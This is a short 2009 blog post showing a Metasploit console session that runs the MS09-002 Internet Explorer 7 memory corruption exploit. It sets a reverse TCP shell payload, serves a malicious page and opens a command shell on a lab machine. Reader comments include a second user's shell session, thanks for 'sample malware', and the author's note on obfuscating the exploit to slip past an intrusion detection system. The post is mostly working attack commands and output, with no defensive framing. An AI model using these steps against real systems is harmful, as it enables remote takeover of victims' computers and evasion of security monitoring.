Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)

6 comments:

  1. Hmmmm... sounds great !! Can't wait for the juicy details ;)

    ReplyDelete
  2. install linux problem solved

    ReplyDelete
  3. got mine!

    msf exploit(ms09_002) > sessions -l -v

    Active sessions
    ===============

    Id Description Tunnel Via
    -- ----------- ------ ---
    1 Command shell 172.10.1.100:1975 -> 172.10.1.104:1116 windows/browser/ms09_002

    msf exploit(ms09_002) >

    ..thanks for the sample malware dean!!

    ReplyDelete
  4. No worries. Happy to help. :) I just need to finish off the obfuscation of the variables in mine and it's done.

    I tested it through ISS's IDS and it's catching the shellcode and nops right now and not the trigger itself although that does not seem easy to alert on.

    ReplyDelete
  5. w00t! i didn't got mine! :(

    ReplyDelete